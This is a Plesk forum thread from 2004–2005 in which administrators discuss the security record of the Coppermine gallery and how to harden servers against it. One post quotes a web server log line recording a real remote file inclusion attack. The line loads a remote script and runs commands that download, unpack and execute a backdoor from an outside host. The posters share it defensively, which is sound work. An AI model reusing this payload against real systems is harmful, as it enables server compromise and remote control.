1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice

Coppermine Application Vault package!!!!!!!

Discussion in 'Plesk for Linux - 8.x and Older' started by VagrantHost, Dec 12, 2004.

  1. VagrantHost

    VagrantHost Guest

    0
     
    i don't understand why noone has put out a package for Coppermine. it is by far the best gallery. tons of people seem to want it.

    someone needs to create this as an App Vault package!
     
  2. Traged1

    Traged1 Guest

    0
     
    It is probably that Coppermine has historically been linked to so many rootings of boxes that its hard to see why it is still in production. Many admins are afraid to have such scripts on thier servers as they probably already got burnt or know someone who has been rooted through coppermine.
     
  3. faris

    faris Guest

    0
     
    Oh great. I've banned the use of phpbb and nuke, so do I need to ban coppermine too? Bah :-(

    Faris.
     
  4. Traged1

    Traged1 Guest

    0
     
    No, but you must make sure you keep it up to date completely or risk getting rooted.
     
  5. Herby

    Herby Guest

    0
     
    coppermine - HAHAHAHAHA
    this comes directly after PHPNuke in point of security.

    look on my yesterdays log:

    202.95.145.102 - - [26/Mar/2005:17:59:10 +0100] "GET modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.geocities.com/hendra_juzt/inject.txt?&cmd=uname%20-a;id;cd%20/var/tmp;wget%20makassar.us/ary.tar.gz;tar%20zxvf%20ary.tar.gz;cd%20.psy;./config%20REMON%202222;./****;./run HTTP/1.1" 200 12655 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

    if i hadnt secured my tmp i would have been compromised now.

    ps: you are free to block this ip in your firewall :p
     
  6. faris

    faris Guest

    0
     
    Indeed!

    Restricting wget (chmod 700) would also have stopped it in its tracks, I think?

    Faris.
     
  7. Herby

    Herby Guest

    0
     
    yep

    many reasons I am happy of RHEL4 with SELinux - waiting for plesk to respond with a new release for it :)
     
Loading...